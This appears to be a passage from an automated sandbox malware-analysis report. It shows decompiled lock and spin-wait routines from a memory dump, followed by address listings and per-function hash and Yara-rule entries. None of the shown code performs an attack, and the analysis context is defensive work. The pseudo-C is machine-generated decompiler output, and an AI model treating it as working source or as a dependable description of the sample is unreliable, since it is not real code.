									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01B66B90(_t210,  &_v64);
										_t262 =  *0x1c28608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E01B6E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E01B797C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E01B7006A(0x1c28608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1c28608);
												E01B7B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1c26904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1c26e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E01B4FFB0(_t198, _t240, 0x1c28608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E01B700C2(0x1c28608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x01b620a0
0x01b620a8
0x01b620ad
0x01b620b3
0x01b620b8
0x01b620c2
0x01b620c7
0x01b620cb
0x01b620d2
0x01b62263
0x01b62266
0x01ba5836
0x01ba5836
0x00000000
0x01b6226c
0x01b6226c
0x01b62270
0x01b62274
0x01b620e2
0x01b620e2
0x01b620e6
0x01b620ee
0x01ba57dc
0x01ba57de
0x01ba57ec
0x01ba57ec
0x01ba57f1
0x01ba57f3
0x01ba57f8
0x00000000
0x01ba57f8
0x01ba57e0
0x01ba57e4
0x01ba57ea
0x00000000
0x00000000
0x00000000
0x01ba57ea
0x01b620f4
0x01b620f4
0x01b620f8
0x01b620f8
0x01b620fc
0x01b62100
0x01b62106
0x01b62201
0x01b62206
0x01b6220b
0x01b6220e
0x01b622a9
0x01b622ac
0x00000000
0x00000000
0x01b622b2
0x01b622b5
0x01ba5801
0x01ba5806
0x00000000
0x00000000
0x01ba5810
0x01ba5815
0x01ba5818
0x00000000
0x00000000
0x01ba581e
0x01b622bb
0x01b622bb
0x01b62218
0x01b62218
0x01b6221c
0x01b62220
0x01b62222
0x01b622c2
0x01b622c4
0x01b622dc
0x01b622dc
0x01b622e1
0x00000000
0x00000000
0x00000000
0x01b622e7
0x01b622c8
0x01b622cd
0x01b622d3
0x01b622d6
0x01ba5823
0x01ba5825
0x01ba5827
0x00000000
0x00000000
0x01ba582d
0x00000000
0x01ba582d
0x00000000
0x01b62228
0x01b62228
0x00000000
0x01b62228
0x01b62222
0x01b62214
0x01b62214
0x00000000
0x01b62114
0x01b62114
0x01b62114
0x01b6211a
0x01b6211c
0x01b62348
0x01b6234d
0x01ba5840
0x01ba5845
0x01ba5848
0x01ba584e
0x01ba584e
0x01ba5848
0x01b62353
0x01b62355
0x01b62388
0x01b62388
0x01b62368
0x01b6236a
0x01b6236c
0x01b6238f
0x00000000
0x01b6236e
0x01b6236e
0x01b6218e
0x01b6218e
0x01b62191
0x01b62195
0x01ba5a03
0x01ba5a06
0x01ba5a0c
0x01ba5a0f
0x01ba5a11
0x01ba5a13
0x01ba5a13
0x01ba5a19
0x01ba5a1f
0x00000000
0x01b6219b
0x01b6219b
0x01b621a0
0x01b62282
0x01b62284
0x01b62284
0x01b62284
0x01b62284
0x01b621a6
0x01b621a9
0x01b621ac
0x01b621ae
0x01b621b3
0x01b6228b
0x01b62290
0x01b62379
0x01b62296
0x01b62298
0x01b62298
0x01b62290
0x01b621b9
0x01b621be
0x01b622a2
0x01b622a2
0x01b621c4
0x01b621c8
0x01b621cc
0x01b621d0
0x01b621d4
0x01b621de
0x01b621e3
0x01ba5a29
0x01ba5a2c
0x00000000
0x00000000
0x01ba5a3b
0x00000000
0x01b621e9
0x01b621e9
0x01b621e9
0x01b621ee
0x01b621f1
0x01ba5a45
0x01ba5a4b
0x01ba5a52
0x01ba5a58
0x01ba5a5d
0x01ba5a5f
0x01ba5a71
0x01ba5a61
0x01ba5a6a
0x01ba5a6a
0x01ba5a76
0x01ba5a79
0x01ba5a7f
0x01ba5a83
0x01ba5a85
0x01ba5a87
0x01ba5a87
0x01ba5a8c
0x01ba5a91
0x01ba5a97
0x01ba5a9f
0x01ba5aa0
0x01ba5aa1
0x01ba5aa6
0x01ba5aab
0x01ba5ab1
0x01ba5ab3
0x01ba5ab9
0x01ba5aca
0x01ba5ad4
0x01ba5ad4
0x01ba5ade
0x01ba5ade
0x01ba5aab
0x01ba5a79
0x01ba5a52
0x01b621f7
0x01b621f9
0x01b621fe
0x01b621fe
0x01b621e3
0x01b62195
0x01b6236c
0x01b62122
0x01b62122
0x01b62124
0x01b62231
0x01b62236
0x01b62236
0x01b62238
0x01b62238
0x01b62240
0x01b62242
0x01b62244
0x01ba59fc
0x01b6218c
0x01b6218c
0x00000000
0x01b6218c
0x01b6224a
0x01b6224f
0x01b62256
0x01b62304
0x01b62309
0x01b6230f
0x01b6231e
0x01b6231e
0x01b6231e
0x01b62320
0x01b62325
0x01b6232a
0x01b6232c
0x01b6233e
0x01b6233e
0x00000000
0x01b6232c
0x01b62311
0x01b62317
0x01b6231a
0x01b6231c
0x01b62380
0x01b62380
0x01b62380
0x01b62384
0x00000000
0x00000000
0x01b62386
0x00000000
0x01b6231c
0x01b6225c
0x01b6225c
0x00000000
0x01b6225c
0x01b6212a
0x01b62134
0x01b62138
0x01b6213d
0x01ba5858
0x01ba5863
0x01ba5863
0x01ba5867
0x01ba586a
0x00000000
0x00000000
0x01ba586c
0x01ba586c
0x01ba5871
0x01ba5875
0x01ba5877
0x01ba5997
0x01ba599c
0x01ba59a1
0x01ba59a7
0x01ba59a7
0x00000000
0x01ba59a7
0x01ba587d
0x00000000
0x01ba588b
0x01ba588b
0x01ba5890
0x01ba5892
0x01ba5894
0x01ba5899
0x01ba589b
0x01ba58a0
0x01ba58a0
0x01ba58aa
0x01ba58b2
0x01ba58b6
0x01ba58be
0x01ba58c6
0x01ba58c9
0x01ba590d
0x01ba5917
0x01ba591a
0x01ba591c
0x01ba5920
0x01ba5928
0x01ba592a
0x01ba592c
0x01ba592e
0x01ba592e
0x01ba58cb
0x01ba58cd
0x01ba58d8
0x01ba58e0
0x01ba58f4
0x01ba58fe
0x01ba58fe
0x01ba593a
0x01ba593e
0x01ba5940
0x01ba5942
0x00000000
0x01ba5944
0x01ba5944
0x01ba5949
0x01ba594e
0x01ba594e
0x01ba5953
0x01ba595b
0x01ba5976
0x01ba5976
0x01ba597a
0x01ba597f
0x00000000
0x00000000
0x00000000
0x00000000
0x01ba5981
0x01ba5981
0x01ba5981
0x01ba5983
0x01ba5988
0x01ba598d
0x01ba5991
0x01ba5991
0x00000000
0x01ba595d
0x01ba595d
0x01ba5963
0x01ba5965
0x00000000
0x00000000
0x00000000
0x00000000
0x01ba5967
0x01ba5967
0x01ba596b
0x01ba596d
0x00000000
0x00000000
0x01ba596f
0x01ba5971
0x01ba5971
0x01ba5974
0x00000000
0x00000000
0x00000000
0x01ba5974
0x00000000
0x01ba5967
0x01ba595b
0x01ba5942
0x01ba5863
0x01b62143
0x01b62143
0x01b62149
0x01b6214f
0x01b622f1
0x01b622f6
0x00000000
0x01b62173
0x01b62173
0x01b6217d
0x01b62181
0x01b62186
0x01ba59ae
0x01ba59b2
0x01ba59b5
0x01ba59b7
0x01ba59ba
0x01ba59cd
0x01ba59d1
0x01ba59d5
0x01ba59d9
0x01ba59db
0x00000000
0x00000000
0x01ba59dd
0x01ba59dd
0x01ba59e1
0x01ba59e4
0x01ba59e7
0x01ba59ee
0x01ba59ee
0x01ba59f3
0x01ba59f3
0x00000000
0x01b62186
0x01b6214f
0x01b62106
0x01b62266
0x01b620d8
0x01b620da
0x01b620e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 589e55172e6d7b4f1e65c7f6516adb931e5c3bae9efb8c315db83ae4bfa2c9e3
Instruction ID: c5162572b14f2f542c451ff6917326fd859270160082eed972fe60c9e2991ead
Opcode Fuzzy Hash: 589e55172e6d7b4f1e65c7f6516adb931e5c3bae9efb8c315db83ae4bfa2c9e3
Instruction Fuzzy Hash: B1F1D1716083419FEB3ECF2CC44076A7BE9EBA5324F0486DDE9959B281D738D941CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01B4D5E0, Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c80d6e0370a266854846c049846799c660ba5bf9fdf440515b361e3d8b819a7
Instruction ID: 6bcf1416126a2331580a98ab44deec1e2ff0d0c959a08d430ba081bf2a2ce22c
Opcode Fuzzy Hash: 4c80d6e0370a266854846c049846799c660ba5bf9fdf440515b361e3d8b819a7
Instruction Fuzzy Hash: AAE1B030A0135ACFEF39CF58C984B69B7B2FF65304F0482E9E90997291D7349981DB51

Uniqueness

Uniqueness Score: -1.00%

Function 01B4849B, Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd2625887cda8cbba97de2f1c41eb58b15a1cad06b91816563a88d513b7b8611
Instruction ID: cad39f9463c84c72c7f53bb935d72875a58ae064a84856890c114c270626fa20
Opcode Fuzzy Hash: bd2625887cda8cbba97de2f1c41eb58b15a1cad06b91816563a88d513b7b8611
Instruction Fuzzy Hash: A6B16C70E00209DFDF29DFE9C984AADBBB9FF58304F1081ADE505AB245DB74A941DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01B6513A, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfda453bd3e2e32655f76eb854eee6c5ab8d974853ed732e165bf7499e2d01a2
Instruction ID: 85d3c3af3e674e708c6b939a23599d49b9d3e9301970e4ac66b30b4dcd50f1ea
Opcode Fuzzy Hash: bfda453bd3e2e32655f76eb854eee6c5ab8d974853ed732e165bf7499e2d01a2
Instruction Fuzzy Hash: 52C123B55083818FD358CF28C480A5AFBE1FF88304F584AAEF9998B352D775E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01B603E2, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e61447aa135d5ce2054aa4a217fc33a3701ecd1f1a4e4afb46571d786651299f
Instruction ID: d939dbeeb88aa1516c63268e85eba019d41e9670f3c2b4d949583877538d1d81
Opcode Fuzzy Hash: e61447aa135d5ce2054aa4a217fc33a3701ecd1f1a4e4afb46571d786651299f
Instruction Fuzzy Hash: 8E91FA31E042159BEF3DAB6DC844BAD7BB4EB15714F1902E1FA51A72D1DBB89D00C781

Uniqueness

Uniqueness Score: -1.00%

Function 01B3C600, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 462378f3223924f653a063973ed15e37e3b9fe92a1bf0049116c00991553df76
Instruction ID: d2cd4517c62494dbfae5b994f239c45a38b7fd98808e033e3bb7618369904ecf
Opcode Fuzzy Hash: 462378f3223924f653a063973ed15e37e3b9fe92a1bf0049116c00991553df76
Instruction Fuzzy Hash: 2081A57560C701AFDB29CE58C890A3B77A4EB84350F9445AAFE45DB241DB32DD41C791

Uniqueness

Uniqueness Score: -1.00%

Function 01BCB8D0, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a9794861c0faa1bfd457222a74c456f7e5429b6a7e4a052849cbc7e58277bde
Instruction ID: 07c5a5ebe45e3ec575ea67caf1c1e11f07c2e9f01a8b9cb67e81852b3ccd86d1
Opcode Fuzzy Hash: 6a9794861c0faa1bfd457222a74c456f7e5429b6a7e4a052849cbc7e58277bde
Instruction Fuzzy Hash: 9371F432240702EFEB39CF18CA46F5ABBB5EF40BA1F1445ACE655876A0DB71E940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01BB6DC9, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: e4335e6aee6fdc3363650c2f07b089b1e3e75d288383862d4d57aa9260043b90
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 40716F71A00609EFDF15DFA4C984EEEBBB9FF48710F1040A9E505E7690DB70AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01B352A5, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e4e89b8a899d89c4f044d332b943cfd7f65ccd43eac7037b751807bb6d2a655
Instruction ID: a28cb0c62ae50c9ae224084c4c597e5f17e85af8eeb6fa4a0a7ac9108930f667
Opcode Fuzzy Hash: 2e4e89b8a899d89c4f044d332b943cfd7f65ccd43eac7037b751807bb6d2a655
Instruction Fuzzy Hash: 6051C071205742ABDB29EF68C880B27BBE8FFA4710F1449ADF49587651E774E840C791

Uniqueness

Uniqueness Score: -1.00%

Function 01B62AE4, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f38bc49693a3782c10d824445dd803a4f31c62c501973c41b343349503ba7aed
Instruction ID: 91354eda494839750ebc768f60c8bc9c1352fd84b3a3c14ef9fea114e5562d0d
Opcode Fuzzy Hash: f38bc49693a3782c10d824445dd803a4f31c62c501973c41b343349503ba7aed
Instruction Fuzzy Hash: C351C076A00125CFDB28CF1CC4909BDB7B5FBA870070985DAE946EB315D738EA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01BFAE44, Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca111170bde475fd59dae3050fbf032be2eb13966e6ed74a82ebcbcf37120b14
Instruction ID: c23babb5bf7ab30ded845f467d04a0454efaaf5f271db6fc3cedd2090d2c12d6
Opcode Fuzzy Hash: ca111170bde475fd59dae3050fbf032be2eb13966e6ed74a82ebcbcf37120b14
Instruction Fuzzy Hash: ED41D9717002119BDB2E9A3DC894B7BB799EF94710F14429DFB1ACB2D0D734D809C691

Uniqueness

Uniqueness Score: -1.00%

Function 01B5DBE9, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0235aa8a7f31f19d32aa1a992c9623cae9291b13c21843ec28e728bc07cbe4a0
Instruction ID: 8cbb5f9a7a1cffbc7c9c731da0b62f906786169e2d890f609b95ffe1bb90fb2f
Opcode Fuzzy Hash: 0235aa8a7f31f19d32aa1a992c9623cae9291b13c21843ec28e728bc07cbe4a0
Instruction Fuzzy Hash: E351AF71A01616DFCF69CFA8C490BAEBBF1FB58310F20829AD955A7344DB31A944CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01B4EF40, Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 8c8b2c985e15da5e9f9a4bbee1986295561d15c63e6560f5966b880b93b4076a
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: DF51B330A042459FEB29CF6CC1947AEBBB1FF49314F14C2E8D54597382C379A989E751

Uniqueness

Uniqueness Score: -1.00%

Function 01C0740D, Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 08608be97be373cb5784cdf6897d19efb307137ade0396a8a0eae0d95237a1cc
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: C6518171500646DFDB1ACF58C480A95BBF5FF45304F15C1AAE9089F252E372EA45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01B62990, Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9165b44b1ca1efa73a373b3e9a7c42617e29316698f9e39efe523786b76de10
Instruction ID: 422a250d081fbe8526efc142301a0d2eed2f3b99a9a14475eb10fe6fc5e72dd2
Opcode Fuzzy Hash: e9165b44b1ca1efa73a373b3e9a7c42617e29316698f9e39efe523786b76de10
Instruction Fuzzy Hash: C1517F7190020ADFEF29DF59C840ADEBBB9FF68310F0181E5E910AB260D3799952CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01B64BAD, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c45af7677e0441877fd8f54fd264c39acc6fa6741733309c0d5f3f6d4ce9d19
Instruction ID: 4118016055e23dee76988a7667df9630bdbd6ed86cfbad906ec485254e96b130
Opcode Fuzzy Hash: 9c45af7677e0441877fd8f54fd264c39acc6fa6741733309c0d5f3f6d4ce9d19
Instruction Fuzzy Hash: FE41B275A006299BDF29DF68C940BEA7BB8EF55700F4500E5E908AB341EB74DE84CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01B64D3B, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f8019225aaddfba317eb3622328a4eb3d7c1d685dcfba06e634fef1b1383b7
Instruction ID: 0dd36cc8596c23ea9d4be346001405f4ba43f685a7414fb3524ade63a3181062
Opcode Fuzzy Hash: e5f8019225aaddfba317eb3622328a4eb3d7c1d685dcfba06e634fef1b1383b7
Instruction Fuzzy Hash: 0D41E471A447189FEB3EDF14CC80F6ABBA9EB65710F0400DAE90597281D778DD40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01BFAA16, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: db4af46b1a1283d2b9ec5a5ad30d559ace96eefb9d142311b0319794cad6a434
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: CF31C731B001496BEF1D8B79C885BAFFBBADF84210F0584ADEA09E7252DB749D08C750

Uniqueness

Uniqueness Score: -1.00%

Function 01B48A0A, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3af43ea59ee6277dd35f573745e8a2e703e18ea6f84b3493959ef65b4207d255
Instruction ID: 100277c83c8a2f8dcde0cd3b61b447f29743ea325572a73763f4b915f033cfcd
Opcode Fuzzy Hash: 3af43ea59ee6277dd35f573745e8a2e703e18ea6f84b3493959ef65b4207d255
Instruction Fuzzy Hash: 2F4162B5A0022D9FDB28DF99CC88AA9B7F4FB54300F1086E9D919D7252E7719E80DF50

Uniqueness

Uniqueness Score: -1.00%

Function 01BFFDE2, Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: c68e3f453d34e51f4ca24e9088d1f1317a391130112ce87be9024e67dd5b7d5b
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: F431E533300641AFD72A9B6CC844F7A7BAAEF85A50F18459CEB468B742DB74DC45C750

Uniqueness

Uniqueness Score: -1.00%

Function 01BFEA55, Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 625c68daf458f2e26b61f77e7bdb807c493c6b7b08bac51ec7455bbe1c90a4cf
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: D231D6726047069BCB1DDF28C880A6BB7A9FBD0350F05496DF65687651DF30E809C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01BB69A6, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daf2e96e9d0666bbeb4af58fe7c1229352cead1e92ef55d72cc1b5fdd44e157e
Instruction ID: f9049d2b047dfa755e8aeec6ee4883fed48e0484c6e96564c6222982c200b6b1
Opcode Fuzzy Hash: daf2e96e9d0666bbeb4af58fe7c1229352cead1e92ef55d72cc1b5fdd44e157e
Instruction Fuzzy Hash: 944182B1D002099FDF28DFA9D980BFEBBF4EF48714F148169E915A7250DBB09905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01B35210, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fd39725815a78f728230d100958d162c200a9a74cde375b87651df3afb79b7b
Instruction ID: edb7505900d4d74e4f4e975d766dd69eb691386e6a96006cf1188f1d65de839e
Opcode Fuzzy Hash: 6fd39725815a78f728230d100958d162c200a9a74cde375b87651df3afb79b7b
Instruction Fuzzy Hash: 4B31E331241711EBCF3EAB28CC81B6A7BA9FF60760F1146A9FC554B1A1DB70E811C690

Uniqueness

Uniqueness Score: -1.00%

Function 01B73D43, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f4ea041b93e0d35ef9fd628f6e76a116f219e12123fafb6566f28a9ed87828f
Instruction ID: 92c5fce36a2d85c59dfd990cc57c48377b3c49d20122d0cc1d3104674bfe4acb
Opcode Fuzzy Hash: 1f4ea041b93e0d35ef9fd628f6e76a116f219e12123fafb6566f28a9ed87828f
Instruction Fuzzy Hash: 2231BE31604615DBD72D8F2EC841A6ABBE5FF45700B0585EAE965CB360E730D840E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01B6A61C, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 550167d582bd8cba684b946eb730b4f40fc4d74cdd6948464a66fe4c45f9f3aa
Instruction ID: a0b0131e0b593abdd22b90c3a1fac2a53dd3b42ccb9e51872020d63663056e9d
Opcode Fuzzy Hash: 550167d582bd8cba684b946eb730b4f40fc4d74cdd6948464a66fe4c45f9f3aa
Instruction Fuzzy Hash: B2416AB5A04205DFCF18CF68C490BA9BBF5FBA9714F1481A9E905EB344C778A941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01B5C182, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 029f172fc00fa052b8922c328947dde234a6bed71a96d5f0a76f1db8e23f4e44
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 15314871A01647AFDB4DEBB8C480BE9FB59FF62244F0482DAC91C47201DB355A05DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 01BB7016, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39917adb3cf5e3de847b28bd744c8f51caad8fcdcda803dc96c40ffa43ff6b6d
Instruction ID: 159bbb44485d7d684bc9443b3b0a3c1465205b9fb2de124189ca2b191dc860bb
Opcode Fuzzy Hash: 39917adb3cf5e3de847b28bd744c8f51caad8fcdcda803dc96c40ffa43ff6b6d
Instruction Fuzzy Hash: 2F31C4726047519FC728DF28C981ABAB7F5FFC8700F044A69F99587A90EB70E904C7A5

Uniqueness

Uniqueness Score: -1.00%

